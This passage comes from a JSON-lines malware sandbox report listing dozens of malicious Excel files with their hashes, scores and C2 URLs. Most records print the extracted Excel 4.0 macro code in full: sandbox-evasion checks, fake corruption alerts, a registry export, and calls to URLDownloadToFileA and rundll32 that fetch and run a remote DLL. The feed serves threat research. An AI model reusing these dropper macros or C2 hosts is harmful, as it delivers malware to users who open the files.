255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2eOFTBhlvW\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5cbad24dc4427d77eccaf18f0375f846c5a5d5966f717fb0a7b39cbfafc6ddd3"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5cbad24dc4427d77eccaf18f0375f846c5a5d5966f717fb0a7b39cbfafc6ddd3","filesize":185344,"md5":"245309170870efb7f0e9ca98ea90bd39","sha1":"abeb05b01c7a6cbfb5a4dc0785a713353abeb882","sha256":"5cbad24dc4427d77eccaf18f0375f846c5a5d5966f717fb0a7b39cbfafc6ddd3","sha512":"b1fdf3c6794e6b7aaa450fe18fca204c0c59971fed2efd324c2ee0ed21b40e31474a6c6f83c123132e1b883931f891b288af373b4f36d0375d45d12bec8de60b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5cbad24dc4427d77eccaf18f0375f846c5a5d5966f717fb0a7b39cbfafc6ddd3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5cd72ac1a71edf7efb4ee30f0d069a1f96968746c82a86249f0139043a8f5495"},"analysis":{"reported":"2020-04-09T16:16:30Z","score":10},"files":[{"filename":"5cd72ac1a71edf7efb4ee30f0d069a1f96968746c82a86249f0139043a8f5495","filesize":206336,"md5":"741a3ad2924a4cc5759bd6e2ce15038f","sha1":"c64b71e3e44ebd9b2a7f2878c6e25d3e47d757e3","sha256":"5cd72ac1a71edf7efb4ee30f0d069a1f96968746c82a86249f0139043a8f5495","sha512":"392a99c9f3849aa552a061449acdf61325656b65664b8378603be359872112d62198d4085fe0a36d12fa2c92133df6bb5be90a2567a473ddccd7369a5c4f6694","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5cd72ac1a71edf7efb4ee30f0d069a1f96968746c82a86249f0139043a8f5495.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lM5ctqhBtc\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ce9e7b31da137b7e01797d2128e040a250d65f5cf1edbc14b671abf52605cb4"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5ce9e7b31da137b7e01797d2128e040a250d65f5cf1edbc14b671abf52605cb4","filesize":206336,"md5":"9338791077f7af1ed593bfd71b43a7de","sha1":"9cebe40d9f620a6b8a3be1aa81dd37ae176c2d39","sha256":"5ce9e7b31da137b7e01797d2128e040a250d65f5cf1edbc14b671abf52605cb4","sha512":"a8c36544795b6ad5c36599c0468d1a1ab36101f263a26c82cc085f50a601bbb4b89f70b362379cb64ab0ea340ba265d8c34385324b86d9046ee308e1851b5ae7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ce9e7b31da137b7e01797d2128e040a250d65f5cf1edbc14b671abf52605cb4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4YbnEyPajM\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d1dabfd0bd0430fdc4cbcc4f09c938b10bcb3f9634cc1318b7e8035de0e0cd0"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d1dabfd0bd0430fdc4cbcc4f09c938b10bcb3f9634cc1318b7e8035de0e0cd0","filesize":185344,"md5":"dcaf48e634fc08e17014dcbd5b1633f5","sha1":"1ae43e6f19d69e59a53ea4e5a5d3990c5bca8074","sha256":"5d1dabfd0bd0430fdc4cbcc4f09c938b10bcb3f9634cc1318b7e8035de0e0cd0","sha512":"cfe86b60abda1e83c107f408c27d58d1f00cc25c32f3f9329aedc38a34d056fff39efa2fa6098a1c8849b805e3aefb95da4679ab93acfd2f55fbcc0362f012b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d1dabfd0bd0430fdc4cbcc4f09c938b10bcb3f9634cc1318b7e8035de0e0cd0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d22b1522af0af2a51bb5e4aa097101ea20d79ff469afb254db37098d013246b"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d22b1522af0af2a51bb5e4aa097101ea20d79ff469afb254db37098d013246b","filesize":142848,"md5":"5ff1583775e52afc5331f3a921f851a0","sha1":"f76a26ff7e56e44724557b830b779b7afe5d3c48","sha256":"5d22b1522af0af2a51bb5e4aa097101ea20d79ff469afb254db37098d013246b","sha512":"dc435542c85209ecf7387f417d1781341768145c805c8d1521d0339299863f94963328fccca45460da1bfec78ae9979cf1ca7121e0f9084b2448453e13973674","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d22b1522af0af2a51bb5e4aa097101ea20d79ff469afb254db37098d013246b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"KxXU6vUOs9\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d33ca04a364bd8db6132c2c96d99664ad480fb98f0d9f17e3197bed0b39c31f"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d33ca04a364bd8db6132c2c96d99664ad480fb98f0d9f17e3197bed0b39c31f","filesize":209408,"md5":"33a38988e24fe9b6a30f57fad9abd135","sha1":"52b8e61177ebb0fe8e38b43e212372596c658379","sha256":"5d33ca04a364bd8db6132c2c96d99664ad480fb98f0d9f17e3197bed0b39c31f","sha512":"36c0a045070ebf2be4bd60b0bab4ac41cc43362d0b27658a7506ee8b0ad1091419f04c9be3f57cf6f4a1b533301beb1493c2f06d6d6f79d2567821446705ea33","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d33ca04a364bd8db6132c2c96d99664ad480fb98f0d9f17e3197bed0b39c31f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fYVc4yU4hw\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d3c4fb1fbf8283059601a8f8f6288b79fa30188fc01dd8f104de6bb8aed30b2"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d3c4fb1fbf8283059601a8f8f6288b79fa30188fc01dd8f104de6bb8aed30b2","filesize":167936,"md5":"302e93b31cb082333f4cafe71135f7af","sha1":"9ff6a1b78fb915031f5956cdb8d31cefb0ddef53","sha256":"5d3c4fb1fbf8283059601a8f8f6288b79fa30188fc01dd8f104de6bb8aed30b2","sha512":"6017b696ef718c3003cbec805cb49259d2d16d745f191a2d9fff1d066d81c055307635c079544c867ff4747cc961567f1dbe49d9a78a556f0add54e2ebcddd3e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d3c4fb1fbf8283059601a8f8f6288b79fa30188fc01dd8f104de6bb8aed30b2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IHhgLqOst0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d77c960cce48b2a2b09c452d2736357e6670971deb485c9d7d684d78977ae85"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d77c960cce48b2a2b09c452d2736357e6670971deb485c9d7d684d78977ae85","filesize":116224,"md5":"a268218a217f79d25762dacbb37dbc4d","sha1":"f3ecb156a783de7ee72af8be1322a56c8e8d6305","sha256":"5d77c960cce48b2a2b09c452d2736357e6670971deb485c9d7d684d78977ae85","sha512":"433b90fe99f0a3840f88a32642883a9bfee131f20fa00e5115492acc102380c34e235854f0306c51ef40351e7e3ca0b9e82f744c49534f6f30bc07375de686e2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d77c960cce48b2a2b09c452d2736357e6670971deb485c9d7d684d78977ae85.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eeoVYGR8UP\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d798ca72d73e29205b8af8d3e3a106284a007873c07ab0b256cc0511d48ccd1"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d798ca72d73e29205b8af8d3e3a106284a007873c07ab0b256cc0511d48ccd1","filesize":209408,"md5":"b03e4b81346faa043f1b7177d7de263e","sha1":"3656e28e88d86d3373ea792c10771af766b26c44","sha256":"5d798ca72d73e29205b8af8d3e3a106284a007873c07ab0b256cc0511d48ccd1","sha512":"d5720af718f3d2ef7d1ae57abda10d1de131afeed1b6344511781c90270061e2ac9878dda21433d760abe36a69f926bb105f473c8e571201738d3819aa5ef9c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d798ca72d73e29205b8af8d3e3a106284a007873c07ab0b256cc0511d48ccd1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"N2hlB0cOSw\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d86090043cfa29beedce078bc0fc86214bb6af94b815988fe55dc6a7bc2b629"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d86090043cfa29beedce078bc0fc86214bb6af94b815988fe55dc6a7bc2b629","filesize":147968,"md5":"59aa7979edc33acc822be2dc06f5f31f","sha1":"bf4694deb96b3f4ad5d9fa6da34219ab5c4df220","sha256":"5d86090043cfa29beedce078bc0fc86214bb6af94b815988fe55dc6a7bc2b629","sha512":"7b4cf30b257ea1ad85e4ac73d4fa42405704d146e8d3ab51b3e1b6bb2160d37cf0499a30a840016f0b2a66ada59c35710ddecd15e8cf5732534e01f351043ad2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d86090043cfa29beedce078bc0fc86214bb6af94b815988fe55dc6a7bc2b629.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"s6zLV703AG\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5d8de79336122e35f91ca01cd2664d72c611ed70c77b52627d951d9c7d9fd363"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5d8de79336122e35f91ca01cd2664d72c611ed70c77b52627d951d9c7d9fd363","filesize":112128,"md5":"db728a065419e9d4b05dfe357cc37e4a","sha1":"55669cf75e7d13376cef041cacef54b50ae186b2","sha256":"5d8de79336122e35f91ca01cd2664d72c611ed70c77b52627d951d9c7d9fd363","sha512":"2e9671db81dcae75ace9db0bda70e3b8824dc37159deef7a8f84773ed1d73316c8e8c309c20e97bd6095de0c133006303631a167ba5754fd1e6ab80306a5ed1a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5d8de79336122e35f91ca01cd2664d72c611ed70c77b52627d951d9c7d9fd363.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5da183524791a42ad58aa34382687cd440c44f8ddb91c22c86bd0ad5edb2472b"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5da183524791a42ad58aa34382687cd440c44f8ddb91c22c86bd0ad5edb2472b","filesize":185344,"md5":"84c2c730681db4e3dc5e7b13d06fe00c","sha1":"3b6c6102fcf5e1213c2805fe91bbbca965261d46","sha256":"5da183524791a42ad58aa34382687cd440c44f8ddb91c22c86bd0ad5edb2472b","sha512":"3ace5b31feecfb23a394e3a5a357ebab68930b06e987ef9eea482c7290b05c7050a33b82f27d02730a067c106c6c8956735cdb4c590cd767a0cda845b34fe232","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5da183524791a42ad58aa34382687cd440c44f8ddb91c22c86bd0ad5edb2472b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5db5d4a48dcf01383132c8826741533b6a9f4e61f2d62cc716ba9aa874cdf9b0"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5db5d4a48dcf01383132c8826741533b6a9f4e61f2d62cc716ba9aa874cdf9b0","filesize":103941,"md5":"e8fada64a2a745b0e7b6fd80570338a8","sha1":"c8d602fbaf1ec428d91cd5e5cebee945c6813870","sha256":"5db5d4a48dcf01383132c8826741533b6a9f4e61f2d62cc716ba9aa874cdf9b0","sha512":"8a70955bf58f79d60820f55154118e2832fd5e62e8e7c17fd18948127aaa35632954c5cd4801ced1b398a3f824a4b81ccb0c3fef74903cbbe983b0c30c33323a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5db5d4a48dcf01383132c8826741533b6a9f4e61f2d62cc716ba9aa874cdf9b0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5dd44f3cb15f95079dcf5fd4e696104fff346363e597037e4e00c72e5bf1ccee"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5dd44f3cb15f95079dcf5fd4e696104fff346363e597037e4e00c72e5bf1ccee","filesize":167936,"md5":"3851dd4c7fd92b60777c759dc23892de","sha1":"45211445571ca94be252db0f43421adae92b7ae4","sha256":"5dd44f3cb15f95079dcf5fd4e696104fff346363e597037e4e00c72e5bf1ccee","sha512":"1d8a11e4243f33b9fd29837fb6ec89a92ba1e9666ffb86bc3bf76d30cb40cfee8a01781249dad70ca7d2f383298cbdfd608c1ffc1b28599b9657b00807774762","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5dd44f3cb15f95079dcf5fd4e696104fff346363e597037e4e00c72e5bf1ccee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BdRGpScMMA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5ddd78ab8bb7a4db99b8e0419a7ed9f80e3802830c3f1a1f20bee5580fb08ccb"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5ddd78ab8bb7a4db99b8e0419a7ed9f80e3802830c3f1a1f20bee5580fb08ccb","filesize":209920,"md5":"d7330c8fe2ef3e13e9e30140f78f187f","sha1":"5410caa129052cdce7bcc204945880c1cdede350","sha256":"5ddd78ab8bb7a4db99b8e0419a7ed9f80e3802830c3f1a1f20bee5580fb08ccb","sha512":"0a289c6dc78c11142dc159078aef63c204953e68199ba2e06fb1531fa9a313932264fef255b360a4820c5ad174bb3fe0604f69656077554def0552025bb5a059","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5ddd78ab8bb7a4db99b8e0419a7ed9f80e3802830c3f1a1f20bee5580fb08ccb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1AONZPybbJ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5dfb447dcde6018ee28c00c3c6c2de4a61f7149c8fe62e94b45a013ac6daf54d"},"analysis":{"reported":"2020-04-09T16:16:31Z","score":10},"files":[{"filename":"5dfb447dcde6018ee28c00c3c6c2de4a61f7149c8fe62e94b45a013ac6daf54d","filesize":167936,"md5":"3939b483df64f3a020ad677c6a99facd","sha1":"abfa99521d3552b27a1f28b614bdc6ac6f952fb4","sha256":"5dfb447dcde6018ee28c00c3c6c2de4a61f7149c8fe62e94b45a013ac6daf54d","sha512":"bd578328134fea2162fbbf2eef0d6ab5c234be6fd3ac3b86b944d102dc76ee63f6801c13c93ebcd12cfd18c23e80a5da52db5892085ed039bf7e8d15a8b4b817","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5dfb447dcde6018ee28c00c3c6c2de4a61f7149c8fe62e94b45a013ac6daf54d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, 